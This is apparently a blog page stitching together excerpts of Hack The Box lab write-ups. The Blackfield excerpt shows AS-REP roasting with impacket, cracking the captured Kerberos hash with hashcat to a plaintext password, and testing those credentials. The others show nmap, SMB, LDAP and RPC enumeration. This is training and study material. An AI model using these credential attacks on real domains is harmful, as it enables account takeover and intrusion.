  KMibach                             D        0  Wed Jun  3 17:47:12 2020
  KParvankova                         D        0  Wed Jun  3 17:47:12 2020
  KPregnolato                         D        0  Wed Jun  3 17:47:12 2020
  KRasmor                             D        0  Wed Jun  3 17:47:12 2020
  KShievitz                           D        0  Wed Jun  3 17:47:12 2020
  KSojdelius                          D        0  Wed Jun  3 17:47:12 2020
  KTambourgi                          D        0  Wed Jun  3 17:47:12 2020
  KVlahopoulos                        D        0  Wed Jun  3 17:47:12 2020
  KZyballa                            D        0  Wed Jun  3 17:47:12 2020
  LBajewsky                           D        0  Wed Jun  3 17:47:12 2020
  LBaligand                           D        0  Wed Jun  3 17:47:12 2020
  LBarhamand                          D        0  Wed Jun  3 17:47:12 2020
  LBirer                              D        0  Wed Jun  3 17:47:12 2020
  LBobelis                            D        0  Wed Jun  3 17:47:12 2020
  LChippel                            D        0  Wed Jun  3 17:47:12 2020
  LChoffin                            D        0  Wed Jun  3 17:47:12 2020
  LCominelli                          D        0  Wed Jun  3 17:47:12 2020
  LDruge                              D        0  Wed Jun  3 17:47:12 2020
  LEzepek                             D        0  Wed Jun  3 17:47:12 2020
  LHyungkim                           D        0  Wed Jun  3 17:47:12 2020
  LKarabag                            D        0  Wed Jun  3 17:47:12 2020
  LKirousis                           D        0  Wed Jun  3 17:47:12 2020
  LKnade                              D        0  Wed Jun  3 17:47:12 2020
  LKrioua                             D        0  Wed Jun  3 17:47:12 2020
  LLefebvre                           D        0  Wed Jun  3 17:47:12 2020
  LLoeradeavilez                      D        0  Wed Jun  3 17:47:12 2020
  LMichoud                            D        0  Wed Jun  3 17:47:12 2020
  LTindall                            D        0  Wed Jun  3 17:47:12 2020
  LYturbe                             D        0  Wed Jun  3 17:47:12 2020
  MArcynski                           D        0  Wed Jun  3 17:47:12 2020
  MAthilakshmi                        D        0  Wed Jun  3 17:47:12 2020
  MAttravanam                         D        0  Wed Jun  3 17:47:12 2020
  MBrambini                           D        0  Wed Jun  3 17:47:12 2020
  MHatziantoniou                      D        0  Wed Jun  3 17:47:12 2020
  MHoerauf                            D        0  Wed Jun  3 17:47:12 2020
  MKermarrec                          D        0  Wed Jun  3 17:47:12 2020
  MKillberg                           D        0  Wed Jun  3 17:47:12 2020
  MLapesh                             D        0  Wed Jun  3 17:47:12 2020
  MMakhsous                           D        0  Wed Jun  3 17:47:12 2020
  MMerezio                            D        0  Wed Jun  3 17:47:12 2020
  MNaciri                             D        0  Wed Jun  3 17:47:12 2020
  MShanmugarajah                      D        0  Wed Jun  3 17:47:12 2020
  MSichkar                            D        0  Wed Jun  3 17:47:12 2020
  MTemko                              D        0  Wed Jun  3 17:47:12 2020
  MTipirneni                          D        0  Wed Jun  3 17:47:12 2020
  MTonuri                             D        0  Wed Jun  3 17:47:12 2020
  MVanarsdel                          D        0  Wed Jun  3 17:47:12 2020
  NBellibas                           D        0  Wed Jun  3 17:47:12 2020
  NDikoka                             D        0  Wed Jun  3 17:47:12 2020
  NGenevro                            D        0  Wed Jun  3 17:47:12 2020
  NGoddanti                           D        0  Wed Jun  3 17:47:12 2020
  NMrdirk                             D        0  Wed Jun  3 17:47:12 2020
  NPulido                             D        0  Wed Jun  3 17:47:12 2020
  NRonges                             D        0  Wed Jun  3 17:47:12 2020
  NSchepkie                           D        0  Wed Jun  3 17:47:12 2020
  NVanpraet                           D        0  Wed Jun  3 17:47:12 2020
  OBelghazi                           D        0  Wed Jun  3 17:47:12 2020
  OBushey                             D        0  Wed Jun  3 17:47:12 2020
  OHardybala                          D        0  Wed Jun  3 17:47:12 2020
  OLunas                              D        0  Wed Jun  3 17:47:12 2020
  ORbabka                             D        0  Wed Jun  3 17:47:12 2020
  PBourrat                            D        0  Wed Jun  3 17:47:12 2020
  PBozzelle                           D        0  Wed Jun  3 17:47:12 2020
  PBranti                             D        0  Wed Jun  3 17:47:12 2020
  PCapperella                         D        0  Wed Jun  3 17:47:12 2020
  PCurtz                              D        0  Wed Jun  3 17:47:12 2020
  PDoreste                            D        0  Wed Jun  3 17:47:12 2020
  PGegnas                             D        0  Wed Jun  3 17:47:12 2020
  PMasulla                            D        0  Wed Jun  3 17:47:12 2020
  PMendlinger                         D        0  Wed Jun  3 17:47:12 2020
  PParakat                            D        0  Wed Jun  3 17:47:12 2020
  PProvencer                          D        0  Wed Jun  3 17:47:12 2020
  PTesik                              D        0  Wed Jun  3 17:47:12 2020
  PVinkovich                          D        0  Wed Jun  3 17:47:12 2020
  PVirding                            D        0  Wed Jun  3 17:47:12 2020
  PWeinkaus                           D        0  Wed Jun  3 17:47:12 2020
  RBaliukonis                         D        0  Wed Jun  3 17:47:12 2020
  RBochare                            D        0  Wed Jun  3 17:47:12 2020
  RKrnjaic                            D        0  Wed Jun  3 17:47:12 2020
  RNemnich                            D        0  Wed Jun  3 17:47:12 2020
  RPoretsky                           D        0  Wed Jun  3 17:47:12 2020
  RStuehringer                        D        0  Wed Jun  3 17:47:12 2020
  RSzewczuga                          D        0  Wed Jun  3 17:47:12 2020
  RVallandas                          D        0  Wed Jun  3 17:47:12 2020
  RWeatherl                           D        0  Wed Jun  3 17:47:12 2020
  RWissor                             D        0  Wed Jun  3 17:47:12 2020
  SAbdulagatov                        D        0  Wed Jun  3 17:47:12 2020
  SAjowi                              D        0  Wed Jun  3 17:47:12 2020
  SAlguwaihes                         D        0  Wed Jun  3 17:47:12 2020
  SBonaparte                          D        0  Wed Jun  3 17:47:12 2020
  SBouzane                            D        0  Wed Jun  3 17:47:12 2020
  SChatin                             D        0  Wed Jun  3 17:47:12 2020
  SDellabitta                         D        0  Wed Jun  3 17:47:12 2020
  SDhodapkar                          D        0  Wed Jun  3 17:47:12 2020
  SEulert                             D        0  Wed Jun  3 17:47:12 2020
  SFadrigalan                         D        0  Wed Jun  3 17:47:12 2020
  SGolds                              D        0  Wed Jun  3 17:47:12 2020
  SGrifasi                            D        0  Wed Jun  3 17:47:12 2020
  SGtlinas                            D        0  Wed Jun  3 17:47:12 2020
  SHauht                              D        0  Wed Jun  3 17:47:12 2020
  SHederian                           D        0  Wed Jun  3 17:47:12 2020
  SHelregel                           D        0  Wed Jun  3 17:47:12 2020
  SKrulig                             D        0  Wed Jun  3 17:47:12 2020
  SLewrie                             D        0  Wed Jun  3 17:47:12 2020
  SMaskil                             D        0  Wed Jun  3 17:47:12 2020
  Smocker                             D        0  Wed Jun  3 17:47:12 2020
  SMoyta                              D        0  Wed Jun  3 17:47:12 2020
  SRaustiala                          D        0  Wed Jun  3 17:47:12 2020
  SReppond                            D        0  Wed Jun  3 17:47:12 2020
  SSicliano                           D        0  Wed Jun  3 17:47:12 2020
  SSilex                              D        0  Wed Jun  3 17:47:12 2020
  SSolsbak                            D        0  Wed Jun  3 17:47:12 2020
  STousignaut                         D        0  Wed Jun  3 17:47:12 2020
  support                             D        0  Wed Jun  3 17:47:12 2020
  svc_backup                          D        0  Wed Jun  3 17:47:12 2020
  SWhyte                              D        0  Wed Jun  3 17:47:12 2020
  SWynigear                           D        0  Wed Jun  3 17:47:12 2020
  TAwaysheh                           D        0  Wed Jun  3 17:47:12 2020
  TBadenbach                          D        0  Wed Jun  3 17:47:12 2020
  TCaffo                              D        0  Wed Jun  3 17:47:12 2020
  TCassalom                           D        0  Wed Jun  3 17:47:12 2020
  TEiselt                             D        0  Wed Jun  3 17:47:12 2020
  TFerencdo                           D        0  Wed Jun  3 17:47:12 2020
  TGaleazza                           D        0  Wed Jun  3 17:47:12 2020
  TKauten                             D        0  Wed Jun  3 17:47:12 2020
  TKnupke                             D        0  Wed Jun  3 17:47:12 2020
  TLintlop                            D        0  Wed Jun  3 17:47:12 2020
  TMusselli                           D        0  Wed Jun  3 17:47:12 2020
  TOust                               D        0  Wed Jun  3 17:47:12 2020
  TSlupka                             D        0  Wed Jun  3 17:47:12 2020
  TStausland                          D        0  Wed Jun  3 17:47:12 2020
  TZumpella                           D        0  Wed Jun  3 17:47:12 2020
  UCrofskey                           D        0  Wed Jun  3 17:47:12 2020
  UMarylebone                         D        0  Wed Jun  3 17:47:12 2020
  UPyrke                              D        0  Wed Jun  3 17:47:12 2020
  VBublavy                            D        0  Wed Jun  3 17:47:12 2020
  VButziger                           D        0  Wed Jun  3 17:47:12 2020
  VFuscca                             D        0  Wed Jun  3 17:47:12 2020
  VLitschauer                         D        0  Wed Jun  3 17:47:12 2020
  VMamchuk                            D        0  Wed Jun  3 17:47:12 2020
  VMarija                             D        0  Wed Jun  3 17:47:12 2020
  VOlaosun                            D        0  Wed Jun  3 17:47:12 2020
  VPapalouca                          D        0  Wed Jun  3 17:47:12 2020
  WSaldat                             D        0  Wed Jun  3 17:47:12 2020
  WVerzhbytska                        D        0  Wed Jun  3 17:47:12 2020
  WZelazny                            D        0  Wed Jun  3 17:47:12 2020
  XBemelen                            D        0  Wed Jun  3 17:47:12 2020
  XDadant                             D        0  Wed Jun  3 17:47:12 2020
  XDebes                              D        0  Wed Jun  3 17:47:12 2020
  XKonegni                            D        0  Wed Jun  3 17:47:12 2020
  XRykiel                             D        0  Wed Jun  3 17:47:12 2020
  YBleasdale                          D        0  Wed Jun  3 17:47:12 2020
  YHuftalin                           D        0  Wed Jun  3 17:47:12 2020
  YKivlen                             D        0  Wed Jun  3 17:47:12 2020
  YKozlicki                           D        0  Wed Jun  3 17:47:12 2020
  YNyirenda                           D        0  Wed Jun  3 17:47:12 2020
  YPredestin                          D        0  Wed Jun  3 17:47:12 2020
  YSeturino                           D        0  Wed Jun  3 17:47:12 2020
  YSkoropada                          D        0  Wed Jun  3 17:47:12 2020
  YVonebers                           D        0  Wed Jun  3 17:47:12 2020
  YZarpentine                         D        0  Wed Jun  3 17:47:12 2020
  ZAlatti                             D        0  Wed Jun  3 17:47:12 2020
  ZKrenselewski                       D        0  Wed Jun  3 17:47:12 2020
  ZMalaab                             D        0  Wed Jun  3 17:47:12 2020
  ZMiick                              D        0  Wed Jun  3 17:47:12 2020
  ZScozzari                           D        0  Wed Jun  3 17:47:12 2020
  ZTimofeeff                          D        0  Wed Jun  3 17:47:12 2020
  ZWausik                             D        0  Wed Jun  3 17:47:12 2020

                5102079 blocks of size 4096. 1697641 blocks available

└─$ smbclient -N //10.10.10.192/forensic 
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
  • Each directory is empty
    • But we can use it to create a userlist and try AS-REP-roasting
└─$ impacket-GetNPUsers -usersfile users.list -dc-ip 10.10.10.192 blackfield.local/
Impacket v0.11.0 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
...
$krb5asrep$23$support@BLACKFIELD.LOCAL:1f10d897a1b644a032f41814413ebe39$b16365d416a55a510ac198406233651071444fb1de08ba43529cd7dad0a9ca5025653e234e9ee14f3cbafabb4a492089bfdf57e1b7e2328003154bafdb0bcea191020a3dce2f3aac242166054e1c32c90f2fc1f932f0c92a62bf3d30a1ce26539d5d0b14143f0e409b7c66eeefb1c7fc5c900b17595a083fb23ae675f82d9eae5b02fef0f5178b1f35ca50fd98b3f5adff177028626db9ccccbf841746a01fa7d734f9fbc6f91b62a9a676c1f188a48624c771b75652b4cf94df83849e7bdcb6b9797c4176c3e0e7327b41c3610fcb162b0279f313c79a06c9d3cb127f606198db65bf5c2bae16a91b5b9ec05e5337ef0c623eb2
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
...
  • Crack it with hashcat
    • support:#00^BlackKnight
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-12th Gen Intel(R) Core(TM) i5-12400, 1436/2936 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
...
$krb5asrep$23$support@BLACKFIELD.LOCAL:1f10d897a1b644a032f41814413ebe39$b16365d416a55a510ac198406233651071444fb1de08ba43529cd7dad0a9ca5025653e234e9ee14f3cbafabb4a492089bfdf57e1b7e2328003154bafdb0bcea191020a3dce2f3aac242166054e1c32c90f2fc1f932f0c92a62bf3d30a1ce26539d5d0b14143f0e409b7c66eeefb1c7fc5c900b17595a083fb23ae675f82d9eae5b02fef0f5178b1f35ca50fd98b3f5adff177028626db9ccccbf841746a01fa7d734f9fbc6f91b62a9a676c1f188a48624c771b75652b4cf94df83849e7bdcb6b9797c4176c3e0e7327b41c3610fcb162b0279f313c79a06c9d3cb127f606198db65bf5c2bae16a91b5b9ec05e5337ef0c623eb2:#00^BlackKnight
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:1f10d897a1b6...623eb2
Time.Started.....: Sun Sep 17 19:11:50 2023 (13 secs)
Time.Estimated...: Sun Sep 17 19:12:03 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1089.9 kH/s (0.41ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14335488/14344385 (99.94%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1*6)0 -> #!hrvert
Hardware.Mon.#1..: Util: 91%

Started: Sun Sep 17 19:11:49 2023
Stopped: Sun Sep 17 19:12:05 2023
  • The creds are valid
    • But no winrm access
└─$ crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight

└─$ crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'                               
SMB         10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [-] BLACKFIELD.local\support:#00^BlackKnight

User #1

  • Nothing new in smb except for SYSVOL and NETLOGON
└─$ smbmap -u support -p '#00^BlackKnight' -H 10.10.10.192 
[+] IP: 10.10.10.192:445        Name: BLACKFIELD.local                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share
  • No Kerberoastable users
└─$ impacket-GetUserSPNs blackfield.local/'support':'#00^BlackKnight' -dc-ip dc01.blackfield.local -request                          
Impacket v0.11.0 - Copyright 2023 Fortra

No entries found!
  • ldapsearch to retrieve samaccountname of domain controller
└─$ ldapsearch -H ldap://10.10.10.192 -x -b "DC=blackfield,DC=local" -D 'support@blackfield.local' -w '#00^BlackKnight'
# extended LDIF
#
# LDAPv3
# base <DC=blackfield,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# BLACKFIELD.local
dn: DC=BLACKFIELD,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
...
dn: CN=DC01,OU=Domain Controllers,DC=BLACKFIELD,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
objectClass: computer
cn: DC01
distinguishedName: CN=DC01,OU=Domain Controllers,DC=BLACKFIELD,DC=local
instanceType: 4
whenCreated: 20200223111400.0Z
whenChanged: 20230918021908.0Z
uSNCreated: 12293
uSNChanged: 233542
name: DC01
objectGUID:: yKWttevtGU+AkuFOUWYvng==
userAccountControl: 532480
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132269516749519355
lastLogoff: 0
lastLogon: 133395347215321691
localPolicyFlags: 0
pwdLastSet: 133394771382736467
primaryGroupID: 516
objectSid:: AQUAAAAAAAUVAAAA3sEE+lnfq4Ei72nU6AMAAA==
accountExpires: 9223372036854775807
logonCount: 134
sAMAccountName: DC01$
sAMAccountType: 805306369
operatingSystem: Windows Server 2019 Standard
operatingSystemVersion: 10.0 (17763)
serverReferenceBL: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=C
 onfiguration,DC=BLACKFIELD,DC=local
dNSHostName: DC01.BLACKFIELD.local
...
  • Let’s launch bloodhound
└─$ bloodhound-python -c all -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 --zip
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
  • support has ForceChangePassword rights over audit2020

Sunday, September 17, 2023 | 27 minutes Read
Hero Image
[HTB] Machine: Atom

Atom

Enumeration

  • nmap
└─$ nmap -Pn -p- 10.10.10.237 -T4                   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-10 15:42 BST
Nmap scan report for 10.10.10.237 (10.10.10.237)
Host is up (0.094s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
443/tcp  open  https
445/tcp  open  microsoft-ds
5985/tcp open  wsman
6379/tcp open  redis
7680/tcp open  pando-pub

└─$ nmap -Pn -p80,135,443,445,5985,6379,7680 -sC -sV 10.10.10.237 -T4 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-10 16:01 BST
Nmap scan report for 10.10.10.237 (10.10.10.237)
Host is up (0.23s latency).

PORT     STATE    SERVICE   VERSION
80/tcp   open     http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Heed Solutions
135/tcp  open     msrpc     Microsoft Windows RPC
443/tcp  open     ssl/http  Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| tls-alpn: 
|_  http/1.1
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Heed Solutions
|_ssl-date: TLS randomness does not represent time
445/tcp  open     0�j�7V    Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open     http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6379/tcp open     redis     Redis key-value store
7680/tcp filtered pando-pub
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ATOM
|   NetBIOS computer name: ATOM\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-09-10T08:00:46-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 2h19m23s, deviation: 4h02m30s, median: -36s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-09-10T15:00:47
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.43 seconds
  • smb
└─$ smbclient -N -L //10.10.10.237       

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Software_Updates Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.237 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

└─$ smbclient -N //10.10.10.237/Software_Updates
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Sep 10 16:53:06 2023
  ..                                  D        0  Sun Sep 10 16:53:06 2023
  client1                             D        0  Sun Sep 10 16:53:06 2023
  client2                             D        0  Sun Sep 10 16:53:06 2023
  client3                             D        0  Sun Sep 10 16:53:06 2023
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 12:18:08 2021

                4413951 blocks of size 4096. 1372464 blocks available
smb: \>

Friday, September 8, 2023 | 9 minutes Read
Hero Image
[HTB] Machine: Fuse

Fuse

Enumeration

  • nmap
└─$ nmap -Pn -p- 10.10.10.193 -T4                         
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 16:32 BST
Nmap scan report for 10.10.10.193 (10.10.10.193)
Host is up (0.092s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
49667/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
49680/tcp open  unknown
49698/tcp open  unknown

└─$ nmap -Pn -p53,80,88,135,139,445,464,593,636,3268,3269,5985 -sC -sV 10.10.10.193 -T4
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 17:23 BST
Nmap scan report for 10.10.10.193 (10.10.10.193)
Host is up (0.16s latency).

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-09 16:35:34Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  ��7a)V       Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-09-09T16:35:42
|_  start_date: 2023-09-09T15:42:29
|_clock-skew: mean: 2h32m23s, deviation: 4h02m30s, median: 12m22s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2023-09-09T09:35:41-07:00
  • smb
└─$ smbclient -N -L //10.10.10.193                                                    
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.193 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • ldapsearch
└─$ ldapsearch -H ldap://10.10.10.193 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=fabricorp,DC=local
namingContexts: CN=Configuration,DC=fabricorp,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=fabricorp,DC=local
namingContexts: DC=DomainDnsZones,DC=fabricorp,DC=local
namingContexts: DC=ForestDnsZones,DC=fabricorp,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

└─$ ldapsearch -H ldap://10.10.10.193 -x -b "DC=fabricorp,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=fabricorp,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A6C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v3839

# numResponses: 1
  • rpc
└─$ rpcclient -U "" -N 10.10.10.193
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
  • Web Server

Friday, September 8, 2023 | 11 minutes Read
Hero Image
[HTB] Machine: Intelligence

Intelligence

Enumeration

  • nmap
└─$ nmap -Pn -p- 10.10.10.248 -T4                                                            
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 17:07 BST
Nmap scan report for 10.10.10.248 (10.10.10.248)
Host is up (0.095s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49708/tcp open  unknown
49714/tcp open  unknown

└─$ nmap -Pn -p53,80,88,135,139,389,445,464,593,636,3268,3269,9389 -sC -sV 10.10.10.248 -T4
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 17:11 BST
Nmap scan report for 10.10.10.248 (10.10.10.248)
Host is up (0.17s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Intelligence
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-06 23:10:33Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-09-06T23:11:56+00:00; +6h59m24s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-09-06T23:11:57+00:00; +6h59m24s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2023-09-06T23:11:56+00:00; +6h59m24s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-09-06T23:11:56+00:00; +6h59m24s from scanner time.
